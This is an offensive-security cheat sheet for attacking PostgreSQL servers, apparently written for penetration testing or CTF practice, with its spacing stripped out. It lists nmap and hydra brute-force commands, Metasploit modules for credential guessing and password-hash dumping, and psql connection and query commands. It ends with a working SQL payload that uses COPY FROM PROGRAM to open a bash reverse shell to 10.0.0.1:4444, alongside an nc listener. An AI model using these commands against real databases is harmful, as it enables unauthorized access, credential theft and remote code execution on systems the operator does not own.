PostgreSQL a relational database management system. Default port is 5432.
Enumeration
nmap--scriptpgsql-brute-p5432<target-ip>
Brute Force Credentials
hydra-lusername-Ppasswords.txt<target-ip>postgreshydra-Lusernames.txt-ppassword<target-ip>postgres# Metasploitmsfconsolemsf> useauxiliary/scanner/postgres/postgres_loginmsf> setrhosts<target-ip>msf> run
Dump User Hashes
msfconsolemsf> useauxiliary/scanner/postgres/postgres_hashdumpmsf> setrhosts<target-ip>msf> setusername<username>msf> setpassword<password>msf> run
Config File
# Version 14.x/etc/postgresql/14/main/postgresql.conf# Version 15.x/etc/postgresql/15/main/postgresql.conf
Also we may find other locations by viewing environment variables. They are prefixed by PG.
# -W: Force password promptpsql-h<target-ip>-p<target-port>-d<database>-U<username>-W# -w: No passwordpsql-h<target-ip>-p<target-port>-d<database>-U<username>-w
Commands in psql
# Print help\?# Print the version of PostgreSQLselect version();# Display command history\s# List databases\l# Switch to the given database\c<database_name># List tables\dt# Descibe the table information\d<table_name># Get values in the tableselect * from <table>;# List all users\du# Exit psql shell\q
To execute arbitrary command, do the following steps. We’ll perform Reverse Shell. Of course we have to start a listener (e.g. nc -lvnp 4444) in local machine beforehand.
DROPTABLEIF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"';SELECT * FROM cmd_exec;DROPTABLEIF EXISTS cmd_exec;